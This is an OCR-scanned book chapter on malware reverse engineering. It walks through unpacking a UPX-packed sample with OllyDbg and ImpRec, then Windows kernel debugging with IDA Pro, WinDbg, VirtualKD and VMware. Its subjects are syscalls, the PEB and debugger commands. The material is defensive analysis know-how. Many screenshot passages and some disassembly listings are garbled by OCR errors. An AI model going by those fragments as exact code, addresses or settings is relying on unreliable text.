|_MultiScan | | Task Viewer | | Options | | About || Ext | 
M stay on top |»| [>| 














Section Viewer 
Name | V.Offset | V.Size | R.Offset | R.Size _| Flags 
UPXO 00001000 90006000 00000400 00000000 0000080 
UPX1 00007000 00001000 0000400 o0000C00 0000040 
src 00008000 00001000 0001000 00000400 — cood0040 
Close 








The -9 enables best compression and while the section 
names and the imports are reconstructed, PEiD does not 
detect upx.exe as such. 

. Open the binary in OllyDbg and set a breakpoint at the 
following location (scroll down from the entry point to 
reach): 





alex] oll ie Hu 





7. Next, press F7 to step in to the OEP. 





8. To get to the Hello World UPX! string, move to the top 
of the disassembly at 0x401000 or step in by putting a 
breakpoint at the same. 





9. Restart OllyDbg and break at the OEP; run OllyDump with 
the following settings: 


OllyDbg - UPD, exe - [CPU - main thread, module UPD} 





OllyDump - UPD, exe 


Stal Ades: ‘od Sn 
ype (310 (BGP a Con | 


Baseol Code |7000 Base Data [2000 


W Fix Paw Sie tet of Dump nage 


Secon Viva Oe Raw Oe 
UO OUD OOUTOND RIED oncron ECC 
UX) OUond once tooo) ercroo—Eoco 
ve OUOOE? —ootgO0 tooo? enone coco 
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10. Save the file to the disk named DUMP. exe. Then open 
ImpRec and set the OEP value in the box to your lower 
left to the OEP RVA (not VA, that is sans ImageBase or 
else the tool will complain that the address is not in range 
of the process memory). Press IAT AutoSearch and you 
should see the imported functions found successfully. 
Thereafter, press the Fix Dump button and choose the 
earlier DUMP.exe. You should have a fully dumped and 
rebuilt binary with a new imports table with the name 
DUMP_ (notice the extra underscore in the name). Run it 
and see if it works. 


© Import REConstructor v1.6 FINAL (C) 2001-2003 MackT/uCF f i kl 


Attach to an Active Process 




















\c\dcuments and settings administator\desktop\upd. exe (00000535) y Pick DLL 
Imported Functions Found 
+) keinel32.dll FThunk: 00002000 NbFune:D (decimal13) vald'VES Show Invalid 
Ep msvci90. dl FThurk:00002038 NbFune:1C (decimal28) valid VES 
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o\ C:\Documents and Settings \AdministratorDesktop\DUMP_.exe 
Hello World UPRY. 











There will be scenarios and extremely complex 
packed malware that may employ modern 
protection mechanisms and packers such as 
Themida and VMProtect or more lately even 
Codemeter (still unbroken) might be in utility 
sooner than we expect. This, logistically speaking 


will take a lot of time than you have on your 
hands to fully unpack it byte for byte (analyses 
and not cracking based work) - given such a 
situation, do enough to facilitate analyses and 
focus on the bigger picture. As long as you can 
get the details out of the malware binary in 
whatever manner possible, do not get bogged 
down by such impediments as there will be a 
point of diminishing returns, wherein no further 
value will be added to your analyses regardless 
of how well you reverse the packing algorithm, 
unless of course you are researching to write a 
custom unpacker, which would be a very cool 
thing to do indeed! 


Alice in kernel land - 
kernel debugging with 
IDA Pro, Virtual KD, 
and VMware 


Kernel Debugging is an essential day to day 
activity in many reversing sessions, certainly 
more so for the Windows platforms as it is a 
closed source, unlike Linux (open source) where 
reversing has a different connotation mainly 
related to hardware protocols and understanding 
of the system as a whole. Therefore, it is 
advantageous to have a general idea about how 
the various APIs in Windows work together, how 
user mode Ring 3 code can communicate with 
native APIs in Ring O or kernel mode, and how 
the different APIs mechanisms are abstracted 
from each other. User mode code does not have 
a direct interface to the kernel and has to 
implement it via ntdll.dll as a gateway to 
ntoskrnl.exe which is the OS kernel in 
Windows. Many calls to ntdll.dll are done via 
kernel32.dll which acts yet another upper level 
abstraction user mode wrapper. The SYSENTER 
and SYSEXIT assembly mnemonics(opcodes), not 
a call-return pair though, are independently 
employed in the API codes to switch from the 
user mode to the kernel mode and vice versa. 


For 64 bit Windows debugging, your best bet is 
with Windbg (Debugging Tools x64 download). 
For regular 32-bit kernel debugging, using older 
OS versions such as Windows XP you can get 
away with some amount of functionality using 
Softice or the mercurial Syser(site goes offline at 


times), though Windbg is highly recommended 
and is the best debugger as of now. 


Syscalls 


The user mode interface is a 
SharedUserData!SystemCallStub which is 
ntdll.KiFastSystemCall; 


7C9OEB8B >/$ 8BD4 MOV EDX, ESP 
7C9OEB8D |. OF34 SYSENTER 
7COOEBSE |. 90 NOP 
7C9QOEB9O |. 90 NOP 
7C9OEB91 |. 90 NOP 
7C9QEB92 |. 90 NOP 
TFCIQEBS3: ||. 90 NOP 
7C9OEB94 >\$ C3 RETN 


You can search for sequences such as this by 
Opening any application in your favorite 
debugger in Windows XP SP2 - here done in 
OllyDbg. 


Set the CPU view to point at ntdll.dll via right 
click View | ntdll.dll. Press Ctr/+ Fto get the 
Find Command dialog and type the sequence 
mov edx,0x7FFE0300. 
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Note how the call to the value at EDX is identified 
as ntdll.KiFastSystemCall, which is accessed 
via the SYSENTER sequence stub described 
earlier, which is the current Intel architecture 
specific implementation of Ring 3 to Ring 0 and 
back (AMD implements it as SYSCALL). The 
values copied to EAX in similar sequences in ntdll 
are indexes to the syscalls. The next 4 bytes after 
B8 opcode is always the syscall number in this 
pattern. ESP is saved to EDX where the 
parameters are passed from the user stack to the 
kernel stack prior to the system service routine 
invocation. Interrupts are disabled and the 


thread is switched to the kernel mode, where the 
service routine sets up trap frames to bookmark 
its user mode return location and then proceeds 
with the service call, after which the interrupts 
are enabled and the thread returns to the user 
mode. Thus, the user mode code can spend 
significant amount of shared time in the kernel 
space as well. 


You will find that the user mode address ranges 
from 0x00000000 to Ox7FFFFFFF, with higher 
address spaces 0x80000000 to OxFFFFFFFF 
belonging to the kernel code. If you tried writing 
a user mode C program to access a pointer with 
an address in the kernel range, you would get a 
runtime access violation error message from 
Windows. 


The system call occurs for many exported APIs 
with the service call number index in eax; 


7€90D571 >/$ B& 18000000 MOV EAX,18 


7€90D576 |. BA 0003FE7F MOV 

EDX, 7FFE0300 

7€90D57B |. FF12 CALL DWORD 
PTR DS: [EDX] ; call to 


ntdll. ZwClearEvent+0A 
(the 0x0A is the number of bytes from the 
start of the call i.e. OxB8) 


7C90D57D \. C2 0400 RETN 4 
7C€90D580 90 NOP 
7€90D581 90 NOP 
7€90D582 90 NOP 
7€90D583 90 NOP 
7€90D584 90 NOP 
7€90D585 90 NOP 
7C90D586 >/$ B8 19000000 MOV EAX,19 
7C90D58B |. BA 0003FE7F MOV 
EDX, 7FF E0300 

7€90D590 |. FF12 CALL DWORD 
PTR DS: [EDX] ; call to 


ntdll. ZwClose+0A 
7C90D592 \. C2 0400 RETN 4 


The value dereferenced at address in edx is the 
SharedUserData!SystemCallStub described 
before. 


The interrupt 0x2E is also seen. It is an older 
syscall interface, which employs the IDT service 
routines, which is also slower than the current 
mechanisms: 


7C9OEBA5 >/$ 8D5424 08 LEA EDX,DWORD 
PTR SS: [ESP+8] 

7C9OEBA9 |. CD 2E INT 2E 
7C9OEBAB \. C3 RETN 


In Windows 8 Pro WOW64, which is a mechanism 
to run 32 bit binaries on 64 bit Windows, we see 
the following sequence of syscalls in a typical 
ntdll.dll export inside a debugger: 


77000EDC >/$ B8 16000000 MOV EAX,16 
7700QEE1 | . 64:FF15 CQQ000>CALL DWORD 
PTR: FS u(eo] seall, to 
ntdll.ZwAllocateVirtualMemory+5 
77000EE8 \. C2 1800 RETN 18 
77000EEB 90 NOP 


77000EEC >/$ B8 17000000 MOV EAX,17 
77000EF1 |. 64:FF15 CQQ000>CALL DWORD 
PTR FSH [CO] call to 
ntdll.ZwQueryInformationProcess+5 
77Q000EF8 \. C2 1400 RETN 14 
77000EFB 90 NOP 


» 


The RETN 18 disassembly in the preceding code 
has 18h as the number of arguments that are 
passed to this function - 
ZwAllocateVirtualMemory which if you check in 
MSDN is 18h/4 =6. 


The FS:[C0] leads to (press Ctr/+ Gand type 
fs: [0xCO] in OllyDbg); 


76F021DC EA 6625F076 3300 JMP FAR 
0033 :76F 02566 ; Far 
jump 


Which is the 64 bit interface to the syscall (33h is 
one of the two code segments in the WOW64 
process, the first one runs at 23h which is for the 
32 bit CPU code and 33h is used to switch to 64 
bit CPU code). Note the FAR directive and the 
hardcoded value of 76F02566h. 


You can use Dumpbin to further verify the 
exports and check the opcodes manually, or you 
can open the View Names context menu option 
in the Executables Window (A/t+ &) for 
ntdll.dll. in OllyDbg and check if a particular 
API call starts with the preceding sequences. 
Most of the ZwXxx and NtXxx prefixed function 
calls have the signature as mentioned earlier (it 
depends on the OS version and the service 
pack). Ideally, this can be left as a short exercise 
for you to write a script or a program to parse the 
headers of ntdll.dll, extract the export tables 
data, search for the opcodes, list out the API calls 
that have this particular set of interfaces for 
kernel mode switching, as well as having a 
comparative list of syscall numbers and their 
function name and address counterparts. 
OllyDbg maps out and annotates ntdll syscalls to 
their API name strings. Once called, SYSENTER 
uses the following model specific registers, which 
are CPU specific and can be used for debugging 
and other control related CPU features: 


e SYSENTER_CS MSR [174h]: The CS Selector of the target 
segment (CS is overwritten) 


e SYSENTER ESP MSR [175h]: For the target ESP (ESP is 
overwritten) 


e SYSENTER EIP MSR [176h]: For the target EIP (EIP is 
overwritten) 


rdmsr and wrmsr are complementary commands 
that work with reading from and writing to the 
MSR addresses which are passed as the address 
parameters. You can use them in the kernel 
mode only as they won't be accessible from the 
user mode. You can then use the u (unassemble) 
command to get the disassembly at that 
particular location, which will be the actual 
syscall routine. Further commands will be 
discussed as we progress and you are advised to 
keep tabs and cross link their uses as you learn 
about them. 


You are encouraged to explore online at: 
http://www.osronline.com/article.cfm?id=257 and 
http://www.codeguru.com/cpp/misc/misc/system/ 
article.php/c8223/System-Call-Optimization-with- 
the-SYSENTER-Instruction.htm 


Also, a nice presentation using Windbg to glean 
more information about rootkits as we proceed 
with the essential commands one by one, is 
available at 
http://www.reconstructer.org/papers/Hunting%20r 
ootkits% 20with%20Windbg.pdf. You can also 
read the book The Rootkit Arsenal: Escape and 
Evasion in the Dark Corners of the System, Bill 
Blunden and take the free malware and rootkit 
courses at 
http://opensecuritytraining.info/Training.html. 


WDK procurement 


You will have to install the Windows 7 Driver 
Development Kit and the Windows 7 SDK from 
the following links (MSDN can become confusing 
if you have to download a specific ISO file version 


of an SDK, so you have to spend a little time 
actually searching for it): 

http://www. microsoft.com/download/en/details.as 
px?id=11800 and http://www.microsoft.com/en- 
us/download/details.aspx?id=8442. 


They are rather large files ~ 700 MB so you need 
to set some time aside to download them. You 
download the ISO files and mount them using 
the right-click mount option in the Windows 8 
versions, or a dedicated 3rd party ISO mounting 
tool like Daemon Tools. 


Setting up IDA Pro for kernel 
debugging 


The theme used in IDA Pro for this chapter is 
https://github.com/eugeii/ida-consonance. Let us 
set up IDA Pro and VMWare for kernel or 
emulated debugging. IDA Pro a la carte provides 
ten debuggers that can be integrated right out of 
the box. Let us see which ones we can 

implement right away. 


Debugger Options Windows Help 


Run ! Local Bochs debugger 
Attach > Local Windows debugger 
Remote ARMLinux/Android debugger 
Remote GDB debugger 
Remote Linux debugger 
Remote Mac OS X debugger 
Remote Symbian debugger 
Remote WinCE debugger 
Remote Windows debugger 


Windbg debugger 





Since we are discussing Windows specific 
malware, the debuggers listed next are some of 
the options from the menu: 


« Local Bochs debugger 


e« Local Windows debugger 
e Windbg debugger 


« Remote Windows debugger 


Bochs is an emulator and version 2.4.6 is 
working with IDA Pro 6.1 at the time of writing 
this. It is similar to the x86 emulator plugin but 
more powerful as the entire PC hardware is 
emulated. However, in order to run Windows XP, 
Bochs is quite slow. 


Local Windows debugger is best used for Win32 
debugging of the user mode binaries. 


That leaves us with Windbg. 


You can setup kernel debugging over serial cable, 
fire wire or USB (special cable needed), or named 
pipes using emulated serial ports. Since the 
other options require you to have a second 
machine and other accessories, while not 
providing features such as snapshots and record- 
replay as well as running multiple guests on the 
hardware, hence we will use VMware as the 
virtualization technology with named pipes for 
kernel debugging. 


Let us start VMWare with XP SP2 as the guest OS. 
After booting in you need to change the 
boot.ini file settings. Press Windows key + R 
and type msconfig. Set the advanced options as 
shown in the following image and reboot. Your 
Windows guest is now primed for kernel 
debugging. (A caveat for some newbies - check if 
the serial port in your VM guest settings has a 
number greater than 1. If so, then you need to 
change either the COM port in the boot settings 
or delete an unused Serial port such as the 
floppy disk in your VM guest settings.) 


«!. System Configuration Utility 
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On recent Windows OS versions, you can use the 
bcdedit switches. 





bcdedit /set debug on 

bcdedit /set debugtype serial 

bcdedit /set debugport 1 

bcdedit /set baudrate 115200 

bcdedit /set {bootmgr} displaybootmenu 
yes 


4 > 


Additionally, as you will see, the preceding 
configurations are also done by the VirtualKD 
during installation when you proceed to install it. 
You can choose to not install VirtualKD and still 
perform kernel debugging in IDA Pro, though the 
speed benefits are recommended. 


In the VMWare settings, setup the named pipe 
over serial port as shown next. You can name the 
pipe anything you want but you have to be 
consistent about sharing the same pipe name. 


Virtual Machine Settings 
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You should install the Debugging Tools for 
Windows (x86), which by now must be installed 
prior to the next steps so that you get the family 
of debuggers -cdb, ntsd, kd, and Windbg along 
with other tools and utilities like gflags.exe 
which can come in handy. 


Everything is similar in terms of configuration if 
you want to use Windbg standalone for this 


chapter. Press Ctr/+ Kin Windbg to start kernel 
debugging and reference the following exhibit for 
settings: 


COM 1394 | USB2.0| NET | Local 
Kemel debugging over a COM port or virtual serial device 


[v| Pipe 


[¥] Reconnect 


Resets: 
0 











1. Press OK and then navigate to the Debug | Break or 
press Ctr/+ Break to halt the execution in the guest. 


The guest will be unresponsive and you can step in the 
kernel code. If you click into the VM Guest and find that 
you cannot get out of it, you can always press the combo 
Ctrl + Alt (while the mouse pointer is in the VM Guest) 
and then move your mouse away from the guest screen. 


You can use Windbg standalone to debug the kernel, 
however, you also have the option of using IDA Pro as 
the interface and utilize the awesome graphing features, 
and disassembly and analysis engine. This is what we will 
be using for the rest of the concepts discussed in this 
chapter. 

2. Execute IDA Pro and navigate to Debugger | Attach | 
Windbg Debugger. 


§ = Debug application setup: windbg 


Debug options 


Connection string |\com_1,baud=115200,pipe,reconnect ¥ 


Ir Save network settings as default 


[a] cot | te 








3. Type the following string in the Connection string textbox: 
com: port=\\.\pipe\com_1,baud=115200, pipe, reconn 
EGE 


These are the parameters that are reflective of how we 
configured the VMWare settings and the Windows XP 
guest installation boot.ini file. 

4. Press Debug options | Set specific options and set the 
following checks in the Configuration dialog box; most 
notably, the Kernel mode debugging with reconnect 
and initial break. 
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5. Click on OK. If everything is set correctly and IDA Pro 
detects the VMWare guest kernel, you will see the 
following image: 


| 0 <Kernel> 


a) nt | | 








You can also use VirtualKD from 
http://www.sysprogs.com/ that speeds up kernel 
debugging. You download the installation file, 
unzip it, and copy the files in the target folder 
(vminstall.exe along with contents in the x86 
or x64, depending on your guest OS version) to 
the VM Guest and execute it. It will create a new 
boot entry for the VirtualKD debugging support 
and will prompt for a reboot. On reboot, choose 
the Virtual KD debugging option. Execute 
vmmon.exe (or vmmon64. exe if your OS is 64 bit) 
in the host and setup the pipe name displayed in 
vmmon.exe (Shown as kd_<VM Guest name> in 
the next image) in IDA Pro and Kernel Mode 
Debugging in debugger setup dialogs as shown 
earlier. Visit http://www.hexblog.com/?p=123 for 
information on using IDA Pro with VirtualKD 
maintained by HexRays (IDA Pro). 
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You can choose your command-line type by 
pressing the button at the bottom left to choose 
your current command-line environment: 








f=] Output window 


IDC - Native builtin language 


Python - IDAPython plugin 


WINDBG - Send a command to WinDbg 


Down 





The Output window behaves just like Windbg 
with the command-line interface and running 
text output. 
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If required, you can type the Windbg commands 
in a separate dialog box at Debugger | WinDbg 
command, once the IDA Pro is running in the 
Windbg debugging mode. 


Finding symbols in WINDBG/IDA 
PRO 


One of the first things you can do is set the path 
to symbols so that Windbg can find them while 
debugging the kernel. Without symbols, 
debugging the kernel data structures becomes 
an even more complicated and tedious task. 


Choose a path and folder in your local file system 
to store the downloaded or installed symbols as 
they are required by Windbg. The default 
symbols server provided by Microsoft is available 
at http://msdl.microsoft.com/download/symbols. 
To check the current symbols path, use 
.sympath. For instance, to add your custom path 
type Windbg command-line textbox (notice the 
postfix + sign), replace the path with one of your 
selections: 


- .sympath+ D:\Symbols 
- .symfix 


- .reload /f 


You can also type the following line, combining 
the previous commands, though .symfix adds 
the download link automatically without you 
having to remember it: 


. sympath srv*<fully qualified local path> 
*http://msdl. microsoft. com/download/symbo 
ls 


The .reload command deletes all the symbols 
for the current module and reloads the symbols 
as they are needed. The /f switch forces the 
reload. 


That was for Windbg. For IDA Pro internally the 
type library is accessible via Views | Open 
Subviews | Type libraries (Shift+ 11) and 
press /ns to select types to be imported. All 
relevant API types that will be useful in kernel 
debugging, such as mssdk and ntddk from the 
list, can make the code more readable. 


Getting help 


The Debugging Tools for Windows help file is a 
very comprehensive help file. For more 
information on any specific command, type: 


. hh <command> 


Typing .hh on its own in the command line 
brings up the debugging tools help file which 
you can peruse at your own time. 


Windbg 'G' command in IDA Pro 


One quirk that you will find as a result of working 
in IDA Pro is that certain things need to be done 
via IDA Pro. For example, running the attached 
process of kernel requires you to press gin 
Windbg; however, in IDA Pro you have to press 
the Continue Process button or press F9 to 
have a new dialog box appear which you can use 
to suspend the attached process again (instead 
of pressing Ctr/+ Break as in Windbg). You can 
keep the VM guest running after suspension by 
choosing Debugger | Detach from process 
and exiting the debugger. 





Command types 


There are three main kinds of commands in 
Windbg; some are available only during user 
mode debugging or kernel-mode debugging. You 
can navigate to the concerned help manual 
section from the command-line via .hh Debugger 
Reference. 


The following are the command categories: 


- Regular commands: These are built-in commands 
without prefix, for example: dd, da, du, dt ,x 


- Meta commands: These commands are prefixed by a . 
(dot), For example .symfix, .process, .reload 


« Extension commands: These commands are prefixed 
by a ! (bang), for example !process, !idt, !irp, !peb 


Enumerating Running 
Processes 


When you break-in the kernel, one of the first 
things you would want to do is list out the 
running processes and focus on a particular 
process. The !process 0 0 command is a very 
useful extension for this purpose. 


To display the processes on the host machine 
where you are running IDA Pro, you can also use 
.tlist (tasklist), a quick task manager-like 
output, which can be helpful sometimes. 





Syntax: 


! process <proces> <flags> <imagename> 


! process 0 0 








WINDBG 





Various parameters of interest are available, 
which themselves can be used as arguments to 
Windbg commands for further drilling down. 


- PROCESS: <object address> 
« Cid: <thread ID> 


« Peb: <process environment block> 
« ObjectTable: <ObjectTable address> 
e HandleCount 


- ImageName 


To check the current process context -a user 
mode debugger on a single process by attaching 
to it or creating a new one with a debug flag and 
thus getting into the process; it thus runs with a 
singular process context. A kernel debugger, on 
the other hand, has full system access, and 
hence it is mandatory that you check what 
context (user mode process) the debugger is in. 


! process -1 0 





1. To break-invasive into a specific process, perform the 
following: 


. process /i <PROCESS object 
address> 


2. Then press Run (F9) in IDA Pro (type g in Windbg) so that 
the debugger breaks in the subsequent run 
3. Thereafter, you need to reload the symbols: 


. reload /user 


4. Now you can check the current process context and 
confirm it is the one you had specified by ! process -1 0. 
5. To check the process parameters in more detail: 


!process 0 7 <imagename> , in the following exhibit we 
employ verbose output on the current process context - 
System, 


In this example, 7 is the level of detail and gives 
the most verbose output. 








Enumerating Loaded Modules 


To enumerate the list of loaded modules, type Lm. 





Once you have the list of processes running and 
modules loaded, you will be interested to look 
into specific processes and investigate them in 
user space. As discussed, when running an 
executable from Windbg (Open Executable), the 
debugger runs in the loaded executable's 
context. In kernel debugging, it is not so and 
hence you have to specify which process you 
would like to be the current process context. 


The command Lmu will display the loaded 
modules in the current process context. 





Other useful versions of Lm include: 


lmvm <module name without extension> 


!lmi <module name without extension> 





Data Type Inspection and 
Display 


You can inspect data types such as the PEB 
(Process Environment Block), which is similar 
to a manifest for the process object and contains 
a lot of bookkeeping information that can be very 
helpful in malware analysis. 


dt nt! PEB <address of Peb obtained from 
. process -1 0, after context switch> 








You can inspect the Windows data structures 
(data types) on their own, as well as 
superimpose the data structure definitions 
gathered and deciphered from symbol files to the 
relevant addresses obtained from other 
commands, as in the previous image, thus 
making the output more readable. 


You can use - r for recursive output to get a 
more detailed listing of the PEB sub-structures 
such as InMemoryOrderModuleList linked lists 
and other parts of the PEB structure used for 
malware functionality and exploits shellcode. 


dt =F nt! PER 


To get to the TEB directly, you can use the ! teb 
command. 


t -r nt! PEB 


NB elel-bapinrt tol lols bal-t-E-F-} 01-1 : UChar 
adiImageFileExecO ra) : UChar 
+0x002 BeingDebugged 
+0x003 SpareBool 
004 Mutant 
ImageBaseAddress 
Ldr 


Initialized 
SsHandle 
InLoadOrderModuleLi 
+0x000 Flink 
+0x004 Blink : 
+0x014 InMemoryOrderModuleLi 
Flink 
+0x004 Blink > Ptr32z _ 
+0x01lc InInitializationOrderModuleList 
Flink : Ptr3z2 | 
+0x004 Blink : Ptr32 | 


wo 
Sct ti tg 


23 UV, 


+0x024 EntryInProgress <: Ptr32 








For instance, let's check the LIST ENTRY data 
type by probing into the PEB once again. 


0x00191e90 
> 0x28 
fel 
(null 
erModuleList : LIST ENTRY 


+0x000 Flink > Ox00191ec0 _ 
+0x004 Blink 


$4b70 ] 
0 - Oxl9lea4d } 
004 Blink 
nInitializationOrder 
}0 Flink 
Blink 
+0x024 EntryInProgress 





Let's examine the InMemoryOrderModuleList 
chain, 


dt -r _LIST_ ENTRY 0x19lec8 





Let's then display a hex editor-like view of the 
first 500h bytes and you try to identify and mark 
the Flink and Blink pointers, as well as get a 
listing of the unicode strings of the loaded dlls, in 
the exhibit excerpt you can see that 
kernel32.dll, msvcrt.dll, and advapi32.dll 
are loaded in memory. Like db (display byte), you 
also have da and du to display ASCII and Unicode 
strings, and dd to display dwords. The 
counterpart to the d* series of commands are the 
e* commands (enter/edit values), for memory 
based editing with a very similar syntax. The 
following extract is from .hh ed typed in the 
command line: 


This enters data in the same format as the most 
recent e* command. (If the most recent e* command 
was @a, e€Za, eu, or ezu, the final parameter will be 
String and may not be omitted.) 


a 
ee [eevee 
et [ootewordvanes oer 
F 


NULL-terminated ASCII string. 
NULL-terminated Unicode string. 





Another similar command of interest is 
WriteMemory which is analogous to 
WriteProcessMemory() Win32 API and writes the 
to debugee process memory. The signature is: 


ULONG WriteMemory (ULONG PTR offset, 
LPCVOID lpbuffer, ULONG cb, PULONG 
lpcbBytesWritten) ; 


The .writemem command writes a section of the 
memory to a file which can be helpful for in- 
memory dumping during debugging sessions. 


. writemem FileName Range 


Moving on, 


db 0x191lec8 L500 








To verify the order of the dll strings that you see 
in the preceding hex dump, you can use the 
!dlls —m extension command. 





Alternatively, you can simply type !peb 
(remember extension commands, read the 
reference for in-depth descriptions of each such 
command as they come using .hh <command 
name>) in the current process context to get a 
listing of the Peb. 


ReadImageFileExecOpt 


BeingDebugged 
ImageBaseAddress 

ldr 

Idr. Initialized: 
ldr.InInitializatio 
Ldr. InLoadOrderModul 
Idr. 


¢\ SHLWAPT .dll 
\SHELL32 .d11 





as well as other information like environment 
strings and command-line, 





Some of the other commands to explore kernel 
data structures such as DRIVER OBJECT for 
device drivers and the Interrupt Descriptor 
Table (IDT) and model specific registers among 
others, which you are encouraged to explore are: 


The DRIVER OBJECT data structure (use dt -r 
_DRIVER_OBJECT to get a recursive listing). In the 
next image, DriverInit located at 0x2C is the 
address of the entry point of the driver. The 
MajorFunction array consists of 28 IRP (I/O 
Request Packets) handlers. IoLoadDriver is 
the function that can be broken into to get to the 
OEP of the driver, normally during unpacking for 
the same (you can just let the malware run and 
break on the specified APIs, and then dump it for 
static analysis with IDA Pro), especially if the 
driver is loaded using services or APIs like 
ZwLoadDriver, stepping into which the sequence 
of call dword ptr [edi+2Ch] is visible, where 
edi contains the base address of the 

_DRIVER_ OBJECT structure. 





Regarding driver analysis for loading them, OSR 
Driver Loader is a great tool used to simplify the 
loading process. 
http://www.osronline.com/article.cfm?article=157 


Open Systems Resources, Inc. 
105 Route 1014 Suite 19 
Amherst, NH 03031 


Ph: (603) 595-6500 
Fax: (603) 595-6503 ServiceGroupOrder 
Ver V3.0 - Sept 6, 2007 ia 


Registry Key: 


Driver Path: 


Driver Version: 
Driver Size: 
Driver File Time: 


Display Name: 


Service Start: Demand y 
Load Group: None y || Group Load Order 
Order In Group: 1 = Type: Enror:|Nomal  ¥ 


Depend On Group(s} | AudioGroup a 
Base a 
Boot Bu ender 

Boot Fil em 




















Last Status: The operation completed successfully. 


MinFilter Settings 
Default Instance: Altitude: 9 


AltitudeAndFlags : 
Flags: 


Unregister Service (Stat Service] Stop Service 





DLoad at 
http://www.codeproject.com/Articles/43461/Driver 
-Loader-DLoad-from-Scratch is an open source 
tool that provides the following features, along 
with three different ways of loading a driver: 


- Load driver with ZwSetSystemInformation 
e Load driver with NtLoadDriver 

« Load driver with Service Control Manager 

e Unload driver 


e Delete driver file 


e Delete driver registry entries 

e Usage of Thread Injection technique 
- Injection with Rtl\CreateUserThread 
- Injection with CreateRemoteThread 
« Injection with NtCreateThreadEx 

- LOAD Mode 

- UNLOAD Mode 

e Reboot System 

e Shutdown System 


e Any combination of the preceding functions 


Display headers 


If you want to examine the PE headers of a 
particular image, use the Lmu command to list 
the process module list and their addresses. and 
then use !dh <virtual address>, in the 
following exhibit taken for Explorer.exe. 


You can also use Lmv m <module name without 
extension>. 


The PE Headers listed in the following exhibit, 
alternatively you can also use the image name as 
in this example- !dh explorer.exe (or the image 
name of the current process context). 





Pocket calculator 


From the preceding details you can get the OEP 
= (address of entry point + image base), and you 
can use Windbg as a calculator using the ? 
expression calculator. 


Base converter 


To convert between bases of the values you 
obtain or to compare values to aid in your 
analyses, you can use the . format meta 
command. 





Unassembly and disassembly 


Hereon, you can use the u set of commands. 


The command u stands for unassemble and 
takes the address as the main parameter, at the 
following exhibit the disassembly in IDA Pro and 
the other in the Output window of Windbg 
plugin in IDA Pro. You can annotate and label the 
disassembly and use faster navigation, 
visualization, graphs and charts, and run other 
operations and plugins as regular assembly 
listing. 


u 101E24E L50 


The L parameter sets the number of lines to 
display. Remember that the values are in 
hexadecimal. 








Using . (dot) as a parameter passes the EIP 
value to u or uf (Unassemble function), and thus 
disassembles from the address of the instruction 
to be executed next or the current function. You 
can also use ub to disassemble backwards from 
the given address, which can be useful to find 
the set of instructions which led to the current 
instruction address. 


The a (assemble) command assembles the 
instruction mnemonics and puts the resulting 
instruction codes into memory. 


a [Address] 


or current EIP value if the address is left blank. 


Debugger Interaction-Step-in, 
Step Over, Execute till Return 


Stepping in the code and stepping over the 
function calls is done using: 


e t(F11): To step in the code (trace) 
e p (F10): To step over the function calls 


e pct: To step till a call instruction or ret instruction is 
encountered (something like what you would use in 
OllyDbg Ctr/+ F9, Execute till Return) 


Registers 


Reading the value of registers is an important 
feature and this can be done using the r 
command. Additional parameters such as 
register names can be passed to query that 
specific one for instance r eip which gives the 
value at eip. 


WINDBG || 





Call trace and walking the stack 


Walking the stack and getting the stack frames is 
also an important feature which can be done 
using the k commands, which do a stack 
backtrace. 


The outputs of k, kv, kb, and kn are comparable, 
with additional information being the main 
differentiator. 


The excerpts are in text dump so that you can 
analyze the listings in more detail on a page, try 
to see the difference in the output (do you see 
additional parameters?), and then read the 
descriptions from the reference manual for detail. 


WINDBG>k 

ChildEBP RetAddr 

f8af5d20 8065f017 

nt! Rt LpBreakWithStatusInstruction 
f8af5d74 80533dd0 

nt! ExpDebuggerWorker+0x91 
f8af5dac 805c4a28 

nt! ExpWorkerThread+0x100 

f8af5ddc 80540f a2 

nt! PspSystemThreadStartup+0x34 
00000000 00000000 nt! KiThreadStartup+0x16 


WINDBG>kv 

ChildEBP RetAddr Args to Child 

f8af5d20 8065f017 00000007 8055a140 
8055alfc 

nt! RtLpBreakWithStatusInstruction (FPO: 
[1,0,0]) 

F8af5d74 80533dd0 00000000 00000000 
825c63c8 nt! ExpDebuggerWorker+0x91 (FPO: 
[Non-F po]) 

f8af5dac 805c4a28 00000000 00000000 
00000000 nt! ExpWorkerThread+0x100 (FPO: 
[Non-F po]) 

Ff8af5ddc 80540fa2 80533cd0 00000001 
00000000 nt! PspSystemThreadStartup+0x34 
(FPO: [Non-Fpo]) 

00000000 00000000 00000000 00000000 
00000000 nt! KiThreadStartup+0x16 


WINDBG>kb 

ChildEBP RetAddr Args to Child 
f8af5d20 8065f017 00000007 8055a140 
8055alfc 

nt! Rt LpBreakWithStatusInstruction 
f8af5d74 80533dd0 00000000 00000000 
825c63c8 nt! ExpDebuggerWorker+0x91 
f8af5dac 805c4a28 00000000 00000000 
00000000 nt! ExpWorkerThread+0x100 
F8af5ddc 80540fa2 80533cd0 00000001 
00000000 nt! PspSystemThreadStartup+0x34 
00000000 00000000 00000000 00000000 
00000000 nt! KiThreadStartup+0x16 


WINDBG>kn 

# ChildEBP RetAddr 

00 f8af5d20 8065f017 

nt! Rt LpBreakWithStatusInstruction 
01 f8af5d74 80533dd0 


nt! ExpDebuggerWorker+0x91 

02 f8af5dac 805c4a28 

nt! ExpWorkerThread+0x100 

03 f8af5ddc 80540f a2 

nt! PspSystemThreadStartup+0x34 
04 00000000 00000000 

nt! KiThreadStartup+0x16 


Breakpoints 


You would want to place breakpoints as you 
analyze the code. The breakpoint command you 
can use is: 


bp <address> 


bp is implemented as a software breakpoint. 


Break-on-access is a versatile mechanism that 
employs hardware breakpoints provided by the 
CPU and can be used to bypass software 
breakpoint checks and perform memory range 
based breakpoints. 


ba <memory access modes-e/r/w> <size-1,2 
or 4 bytes> <address> 


where e, r, and w are the modes of trigger - on 
execution, read or write of the memory address 
or range. 


Hardware breakpoints are implemented through 
debug registers. The IA-32 CPU has eight debug 
registers with DRO, DR1, DR2, and DR3 used to 
store the memory address of the breakpoints. 
You thus have only 4 such breakpoints in a 
typical debugging session. DR4 and DR5d are not 
used and kept for reserved use. DR6 is used as a 
status register to monitor the event type and 
DR7 monitors the breakpoint conditions, that is 


execution of an instruction, data write, data read 
and write but no execution. 


Memory breakpoints are set using memory page 
permission - guard page, which results in a one 
shot exception (STATUS GUARD PAGE VIOLATION) 
and subsequent return to normal status. 





To list the set breakpoints, you use bl. To clear a 
breakpoint, you use bc <bp number> (the bp 
number can be obtained using bl). To disable a 
breakpoint, use the bd <breakpoint number> 
command. 


First chance and second chance 
debugging 


The debugger handles the exceptions in the user 
mode via SEH (Structured Exception 
Handling) mechanism. SEH are of two primary 
